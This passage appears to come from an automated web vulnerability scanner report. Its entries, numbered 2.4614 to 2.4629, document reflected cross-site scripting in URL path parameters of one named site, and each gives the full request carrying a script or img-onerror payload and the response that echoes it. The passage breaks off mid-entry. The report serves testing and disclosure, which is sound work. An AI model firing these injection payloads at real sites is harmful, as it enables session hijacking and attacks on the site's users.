<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/search.php/fc7a9<img src=a onerror=alert(1)>b45a2d1f06f]</td>
...[SNIP]...

2.4614. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44448<script>alert(1)</script>897007e20d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag44448<script>alert(1)</script>897007e20d7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag44448<script>alert(1)</script>897007e20d7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4615. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 86958<script>alert(1)</script>897a11e8b5091a342 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag86958<script>alert(1)</script>897a11e8b5091a342/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:02:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag86958<script>alert(1)</script>897a11e8b5091a342/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4616. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 5a196</title><img%20src%3da%20onerror%3dalert(1)>b3a2258576f was submitted in the REST URL parameter 2. This input was echoed as 5a196</title><img src=a onerror=alert(1)>b3a2258576f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes5a196</title><img%20src%3da%20onerror%3dalert(1)>b3a2258576f/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes5a196</title><img src=a onerror=alert(1)>b3a2258576f/kosmos/search.php</title>
...[SNIP]...

2.4617. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74ba4<img%20src%3da%20onerror%3dalert(1)>437e5c3602 was submitted in the REST URL parameter 2. This input was echoed as 74ba4<img src=a onerror=alert(1)>437e5c3602 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes74ba4<img%20src%3da%20onerror%3dalert(1)>437e5c3602/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes74ba4<img src=a onerror=alert(1)>437e5c3602/kosmos/search.php]</td>
...[SNIP]...

2.4618. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5d563<img%20src%3da%20onerror%3dalert(1)>1f53bf76b96ac691d was submitted in the REST URL parameter 2. This input was echoed as 5d563<img src=a onerror=alert(1)>1f53bf76b96ac691d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes5d563<img%20src%3da%20onerror%3dalert(1)>1f53bf76b96ac691d/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes5d563<img src=a onerror=alert(1)>1f53bf76b96ac691d/kosmos/search.php]</td>
...[SNIP]...

2.4619. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c01e4</title><img%20src%3da%20onerror%3dalert(1)>aceb843981f561ffa was submitted in the REST URL parameter 2. This input was echoed as c01e4</title><img src=a onerror=alert(1)>aceb843981f561ffa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themesc01e4</title><img%20src%3da%20onerror%3dalert(1)>aceb843981f561ffa/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themesc01e4</title><img src=a onerror=alert(1)>aceb843981f561ffa/kosmos/search.php</title>
...[SNIP]...

2.4620. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bc01f</title><img%20src%3da%20onerror%3dalert(1)>039a09915a1cb4763 was submitted in the REST URL parameter 3. This input was echoed as bc01f</title><img src=a onerror=alert(1)>039a09915a1cb4763 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmosbc01f</title><img%20src%3da%20onerror%3dalert(1)>039a09915a1cb4763/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmosbc01f</title><img src=a onerror=alert(1)>039a09915a1cb4763/search.php</title>
...[SNIP]...

2.4621. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b0025<img%20src%3da%20onerror%3dalert(1)>ec8bb56810f8bc06a was submitted in the REST URL parameter 3. This input was echoed as b0025<img src=a onerror=alert(1)>ec8bb56810f8bc06a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmosb0025<img%20src%3da%20onerror%3dalert(1)>ec8bb56810f8bc06a/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmosb0025<img src=a onerror=alert(1)>ec8bb56810f8bc06a/search.php]</td>
...[SNIP]...

2.4622. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 73080<img%20src%3da%20onerror%3dalert(1)>67623fd77f5 was submitted in the REST URL parameter 3. This input was echoed as 73080<img src=a onerror=alert(1)>67623fd77f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos73080<img%20src%3da%20onerror%3dalert(1)>67623fd77f5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos73080<img src=a onerror=alert(1)>67623fd77f5/search.php]</td>
...[SNIP]...

2.4623. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 66b20</title><img%20src%3da%20onerror%3dalert(1)>acfc2dbf0ae was submitted in the REST URL parameter 3. This input was echoed as 66b20</title><img src=a onerror=alert(1)>acfc2dbf0ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos66b20</title><img%20src%3da%20onerror%3dalert(1)>acfc2dbf0ae/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos66b20</title><img src=a onerror=alert(1)>acfc2dbf0ae/search.php</title>
...[SNIP]...

2.4624. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e98dd<img%20src%3da%20onerror%3dalert(1)>6d9c3f10b46550405 was submitted in the REST URL parameter 4. This input was echoed as e98dd<img src=a onerror=alert(1)>6d9c3f10b46550405 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/search.phpe98dd<img%20src%3da%20onerror%3dalert(1)>6d9c3f10b46550405?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/search.phpe98dd<img src=a onerror=alert(1)>6d9c3f10b46550405]</td>
...[SNIP]...

2.4625. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 19faf</title><img%20src%3da%20onerror%3dalert(1)>0571ac96e533bec4c was submitted in the REST URL parameter 4. This input was echoed as 19faf</title><img src=a onerror=alert(1)>0571ac96e533bec4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/search.php19faf</title><img%20src%3da%20onerror%3dalert(1)>0571ac96e533bec4c?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/search.php19faf</title><img src=a onerror=alert(1)>0571ac96e533bec4c</title>
...[SNIP]...

2.4626. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 6a5cd</title><img%20src%3da%20onerror%3dalert(1)>69bf803fe61 was submitted in the REST URL parameter 4. This input was echoed as 6a5cd</title><img src=a onerror=alert(1)>69bf803fe61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/search.php6a5cd</title><img%20src%3da%20onerror%3dalert(1)>69bf803fe61?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/search.php6a5cd</title><img src=a onerror=alert(1)>69bf803fe61</title>
...[SNIP]...

2.4627. http://www.resellerbase.com/tag/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a6d5d<img%20src%3da%20onerror%3dalert(1)>5fef33f8b5a was submitted in the REST URL parameter 4. This input was echoed as a6d5d<img src=a onerror=alert(1)>5fef33f8b5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/search.phpa6d5d<img%20src%3da%20onerror%3dalert(1)>5fef33f8b5a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/search.phpa6d5d<img src=a onerror=alert(1)>5fef33f8b5a]</td>
...[SNIP]...

2.4628. http://www.resellerbase.com/tag/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 2234e</title><img%20src%3da%20onerror%3dalert(1)>16283c5765e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2234e</title><img src=a onerror=alert(1)>16283c5765e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/search.php/2234e</title><img%20src%3da%20onerror%3dalert(1)>16283c5765e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/search.php/2234e</title><img src=a onerror=alert(1)>16283c5765e</title>
...[SNIP]...

2.4629. http://www.resellerbase.com/tag/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bf2fb<img%20src%3da%20onerror%3dalert(1)>5399e8d38c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf2fb<img src=a onerror=alert(1)>5399e8d38c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/search.php/bf2fb<img%20src%3da%20onerror%3dalert(1)>5399e8d38c2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
